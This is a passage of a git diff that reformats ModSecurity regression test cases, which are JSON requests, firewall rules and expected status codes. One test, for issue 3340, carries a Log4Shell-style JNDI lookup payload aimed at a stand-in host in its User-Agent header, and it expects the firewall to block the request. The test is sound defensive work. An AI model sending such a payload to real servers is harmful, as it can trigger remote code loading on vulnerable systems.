\"id:2,phase:2,setvar:'tx.header_name_%{tx.0}=/%{tx.0}/',deny,status:437,capture,chain\"", + "SecRule TX:/^HEADER_NAME_/ \"@within %{tx.restricted_headers}\" \"setvar:'tx.matched=1',log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - exclusion (8/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - exclusion (8/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',deny,status:500,chain\"", - "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"", - "SecRuleUpdateTargetById 1 !ARGS:/ThIs/" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',deny,status:500,chain\"", + "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"", + "SecRuleUpdateTargetById 1 !ARGS:/ThIs/" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - exclusion/ARGS (9/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - exclusion/ARGS (9/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecRule ARGS|!ARGS:/tHiS/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',deny,status:500,chain\"", - "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"" + "rules": [ + "SecRuleEngine On", + "SecRule ARGS|!ARGS:/tHiS/ \"test\" \"id:1,msg:'Testing %{ARGS:/^ThIs$/}',deny,status:500,chain\"", + "SecRule MATCHED_VARS:/thIs/ \"is a simple test\" \"log\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Variable key selection using a regular expression - exclusion/TX (10/n)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/2296", - "gihub_issue": 2296, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", + "enabled": 1, + "version_min": 300000, + "title": "Variable key selection using a regular expression - exclusion/TX (10/n)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/2296", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", "name1": "value1" }, - "uri":"/?THIS=is+a+simple+test", - "method":"GET" - }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "uri": "/?THIS=is+a+simple+test", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ - "SecRuleEngine On", - "SecAction \"phase:1,setvar:'tx.a=10'\"", - "SecRule TX|!TX:/a/ \"10\" \"id:10,deny,status:500\"" + "rules": [ + "SecRuleEngine On", + "SecAction \"phase:1,setvar:'tx.a=10'\"", + "SecRule TX|!TX:/a/ \"10\" \"id:10,deny,status:500\"" ] } ] diff --git a/test/test-cases/regression/issue-2423-msg-in-chain.json b/test/test-cases/regression/issue-2423-msg-in-chain.json index c667de0542..14b2fa42f6 100644 --- a/test/test-cases/regression/issue-2423-msg-in-chain.json +++ b/test/test-cases/regression/issue-2423-msg-in-chain.json @@ -1,124 +1,168 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Test match variable (1/n)", + "enabled": 1, + "version_min": 300000, + "title": "Test match variable (1/n)", "github_issue": 2423, - "expected":{ - "http_code": 437, - "error_log": "against variable `REQUEST_HEADERS:Transfer-Encoding' .Value: `deflate'" + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", + "request": { + "headers": { + "Host": "localhost", "Transfer-Encoding": "deflate" }, - "uri":"/match-this", - "method":"GET" + "uri": "/match-this", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "error_log": "against variable `REQUEST_HEADERS:Transfer-Encoding' .Value: `deflate'", + "http_code": 437 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_URI \"^.*$\" \"phase:2,deny,capture,id:1,msg:'MatchedVar On Msg: [%{MATCHED_VAR}]',logdata:'MatchedVar On LogData %{MATCHED_VAR}',chain\"", "SecRule REQUEST_HEADERS \"^.*$\" \"status:437\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Test match variable (2/n)", + "enabled": 1, + "version_min": 300000, + "title": "Test match variable (2/n)", "github_issue": 2423, - "expected":{ - "http_code": 437, - "error_log": "MatchedVar On Msg: .deflate." + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", + "request": { + "headers": { + "Host": "localhost", "Transfer-Encoding": "deflate" }, - "uri":"/match-this", - "method":"GET" + "uri": "/match-this", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "error_log": "MatchedVar On Msg: .deflate.", + "http_code": 437 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_URI \"^.*$\" \"phase:2,deny,capture,id:1,msg:'MatchedVar On Msg: [%{MATCHED_VAR}]',logdata:'MatchedVar On LogData %{MATCHED_VAR}',chain\"", "SecRule REQUEST_HEADERS \"^.*$\" \"status:437\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Test match variable (3/n)", + "enabled": 1, + "version_min": 300000, + "title": "Test match variable (3/n)", "github_issue": 2423, - "expected":{ - "http_code": 437, - "error_log": "MatchedVar On LogData: deflate" + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", + "request": { + "headers": { + "Host": "localhost", "Transfer-Encoding": "deflate" }, - "uri":"/match-this", - "method":"GET" + "uri": "/match-this", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "error_log": "MatchedVar On LogData: deflate", + "http_code": 437 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_URI \"^.*$\" \"phase:2,deny,capture,id:1,msg:'MatchedVar On Msg: [%{MATCHED_VAR}]',logdata:'MatchedVar On LogData: %{MATCHED_VAR}',chain\"", "SecRule REQUEST_HEADERS \"^.*$\" \"status:437\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Test match variable (4/n)", + "enabled": 1, + "version_min": 300000, + "title": "Test match variable (4/n)", "github_issue": 2423, - "expected":{ - "http_code": 437, - "error_log": "msg \"Illegal header \\[/restricted/\\]\"" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "Restricted":"attack", - "Other": "Value" + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "Restricted": "attack", + "Other": "Value" + }, + "uri": "/", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + }, - "uri":"/", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "error_log": "msg \"Illegal header \\[/restricted/\\]\"", + "http_code": 437 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS_NAMES \"^.*$\" \"phase:2,setvar:'tx.header_name_%{TX.0}=/%{TX.0}/',deny,t:lowercase,capture,id:500065,msg:'Illegal header [%{MATCHED_VAR}]',logdata:'Restricted header detected: %{MATCHED_VAR}',chain\"", "SecRule TX:/^header_name_/ \"@within /name1/restricted/name3/\" \"status:437\"" diff --git a/test/test-cases/regression/issue-2427.json b/test/test-cases/regression/issue-2427.json index 6b734af65e..adbef0f113 100644 --- a/test/test-cases/regression/issue-2427.json +++ b/test/test-cases/regression/issue-2427.json @@ -1,29 +1,29 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Tmp file retained for @inspectFile (1/2)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Tmp file retained for @inspectFile (1/2)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2\n", "Content-Disposition: form-data; name=\"name\"\n", "\n", @@ -45,11 +45,19 @@ "----------------------------756b6d74fa1a8ee2--\n" ] }, - "expected":{ - "debug_log":"Returning from lua script: abcdef.*Rule returned 1", - "http_code":403 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Returning from lua script: abcdef.*Rule returned 1", + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecTmpSaveUploadedFiles On", @@ -60,30 +68,30 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Tmp file retained for @inspectFile (2/2)", - "resource":"lua", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Tmp file retained for @inspectFile (2/2)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", - "Content-Length":"330", - "Content-Type":"multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", - "Expect":"100-continue" + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", + "Content-Length": "330", + "Content-Type": "multipart/form-data; boundary=--------------------------756b6d74fa1a8ee2", + "Expect": "100-continue" }, - "uri":"/wheee/f%20i%20l%20e%20", - "method":"POST", - "body":[ + "uri": "/wheee/f%20i%20l%20e%20", + "method": "POST", + "body": [ "----------------------------756b6d74fa1a8ee2", "Content-Disposition: form-data; name=\"name\"", "", @@ -105,10 +113,18 @@ "----------------------------756b6d74fa1a8ee2--" ] }, - "expected":{ - "http_code":200 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRequestBodyAccess On", "SecTmpSaveUploadedFiles On", diff --git a/test/test-cases/regression/issue-3340.json b/test/test-cases/regression/issue-3340.json index 6251c860d4..3b37802098 100644 --- a/test/test-cases/regression/issue-3340.json +++ b/test/test-cases/regression/issue-3340.json @@ -16,7 +16,7 @@ "headers": { "Host": "localhost", "User-Agent": "${jndi:ldap://evil.om/w}", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -29,13 +29,17 @@ "uri": "/", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8" + "Content-Type": "text/xml; charset=utf-8" }, - "body": "OK" + "body": [ + "" + ] }, "expected": { "http_code": 403 diff --git a/test/test-cases/regression/issue-394.json b/test/test-cases/regression/issue-394.json index 82827ac868..ab107ee66b 100644 --- a/test/test-cases/regression/issue-394.json +++ b/test/test-cases/regression/issue-394.json @@ -1,38 +1,44 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "Segmentation fault when uploading file with SecStreamInBodyInspection enabled", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/394", - "gihub_issue": 394, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { - "headers": "", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, - "expected": { - "audit_logs": "", - "debug_logs": "", - "error_logs": "" - }, - "rules": [ - "SecRuleEngine On", - "SecRequestBodyAccess On", - "SecResponseBodyAccess On" - ] -} + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "Segmentation fault when uploading file with SecStreamInBodyInspection enabled", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/394", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRequestBodyAccess On", + "SecResponseBodyAccess On" + ] + } ] diff --git a/test/test-cases/regression/issue-849.json b/test/test-cases/regression/issue-849.json index 60e0d4e2a4..dfb1795f11 100644 --- a/test/test-cases/regression/issue-849.json +++ b/test/test-cases/regression/issue-849.json @@ -3,8 +3,8 @@ "enabled": 1, "version_min": 209000, "version_max": -1, - "title": "@ipMatch \"Could not add entry\" on slash\/32 notation in 2.9.0 (1/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/849", + "title": "@ipMatch \"Could not add entry\" on slash/32 notation in 2.9.0 (1/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/849", "client": { "ip": "200.249.12.31", "port": 2313 @@ -17,7 +17,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -27,31 +27,36 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { "http_code": 403 }, "rules": [ "SecRuleEngine On", - "SecRule REMOTE_ADDR \"@ipMatch 200.249.12.31\/32\" \"phase:1,nolog,pass,msg:'Localhost connection',id:1,deny,status:403\"" + "SecRule REMOTE_ADDR \"@ipMatch 200.249.12.31/32\" \"phase:1,nolog,pass,msg:'Localhost connection',id:1,deny,status:403\"" ] }, { "enabled": 1, "version_min": 209000, "version_max": -1, - "title": "@ipMatch \"Could not add entry\" on slash\/32 notation in 2.9.0 (2/2)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/849", + "title": "@ipMatch \"Could not add entry\" on slash/32 notation in 2.9.0 (2/2)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/849", "client": { "ip": "200.249.12.31", "port": 2313 @@ -64,7 +69,7 @@ "headers": { "Host": "net.tutsplus.com", "User-Agent": "", - "Accept": "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-us,en;q=0.5", "Accept-Encoding": "gzip,deflate", "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", @@ -74,16 +79,21 @@ "Pragma": "no-cache", "Cache-Control": "no-cache" }, - "uri": "\/test.pl?foo=bar", + "uri": "/test.pl?foo=bar", "method": "GET", "http_version": 1.1, - "body": "" + "body": [ + "" + ] }, "response": { "headers": { - "Content-Type": "text\/xml; charset=utf-8\n\r", + "Content-Type": "text/xml; charset=utf-8\n\r", "Content-Length": "length\n\r" - } + }, + "body": [ + "" + ] }, "expected": { "http_code": 403 diff --git a/test/test-cases/regression/issue-960.json b/test/test-cases/regression/issue-960.json index 0fdb1ceaca..6a9ea465ad 100644 --- a/test/test-cases/regression/issue-960.json +++ b/test/test-cases/regression/issue-960.json @@ -1,124 +1,134 @@ [ -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "!@within appears to fail (1/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/960", - "gihub_issue": 960, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 - }, - "request": { + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "!@within appears to fail (1/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/960", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { "Host": "www.google.com" }, - "uri": "\/test.pl?param1= test ¶m2=test2", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", "debug_log": "\\(Rule: 960032\\) .* Rule returned 0.", - "error_log": "" + "http_code": 200 }, - "rules": [ - "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'\"", - "SecRule REQUEST_METHOD \"!@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" + "rules": [ + "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'\"", + "SecRule REQUEST_METHOD \"!@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "!@within appears to fail (2/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/960", - "gihub_issue": 960, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 }, - "request": { + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "!@within appears to fail (2/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/960", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { "Host": "www.google.com" }, - "uri": "\/test.pl?param1= test ¶m2=test2", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", - "error_log": "", "http_code": 418 }, - "rules": [ - "SecRuleEngine On", - "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'\"", - "SecRule REQUEST_METHOD \"@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" + "rules": [ + "SecRuleEngine On", + "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=GET HEAD POST OPTIONS'\"", + "SecRule REQUEST_METHOD \"@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" ] -}, -{ - "enabled": 1, - "version_min": 209000, - "version_max": -1, - "title": "!@within appears to fail (3/3)", - "url": "https:\/\/github.com\/SpiderLabs\/ModSecurity\/issues\/960", - "gihub_issue": 960, - "client": { - "ip": "200.249.12.31", - "port": 2313 - }, - "server": { - "ip": "200.249.12.31", - "port": 80 }, - "request": { + { + "enabled": 1, + "version_min": 209000, + "version_max": -1, + "title": "!@within appears to fail (3/3)", + "url": "https://github.com/SpiderLabs/ModSecurity/issues/960", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { "headers": { "Host": "www.google.com" }, - "uri": "\/test.pl?param1= test ¶m2=test2", - "body": "", - "method": "GET", - "http_version": 1.1 - }, - "response": { - "headers": "", - "body": "" - }, + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, "expected": { - "audit_log": "", - "error_log": "", "http_code": 418 }, - "rules": [ - "SecRuleEngine On", - "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", - "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=HEAD POST OPTIONS'\"", - "SecRule REQUEST_METHOD \"!@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" + "rules": [ + "SecRuleEngine On", + "SecDefaultAction \"phase:1,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecDefaultAction \"phase:2,log,deny,status:418,tag:'Host: %{request_headers.host}'\"", + "SecAction \"id:'900012',phase:request,nolog,pass,t:none,setvar:'tx.allowed_methods=HEAD POST OPTIONS'\"", + "SecRule REQUEST_METHOD \"!@within %{tx.allowed_methods}\" \"msg:'Method is not allowed by policy',severity:'WARNING',id:'960032',phase:request,block,rev:'2',ver:'OWASP_CRS/3.0.0',maturity:'9',accuracy:'9',tag:'application-multi',tag:'language-multi',tag:'platform-multi',tag:'attack-generic',tag:'OWASP_CRS/POLICY/METHOD_NOT_ALLOWED',tag:'WASCTC/WASC-15',tag:'OWASP_TOP_10/A6',tag:'OWASP_AppSensor/RE1',tag:'PCI/12.1',logdata:'%{matched_var}',setvar:'tx.msg=%{rule.msg}',setvar:tx.anomaly_score=+%{tx.warning_anomaly_score},setvar:tx.%{rule.id}-OWASP_CRS/POLICY/METHOD_NOT_ALLOWED-%{matched_var_name}=%{matched_var}\"" ] -} + } ] diff --git 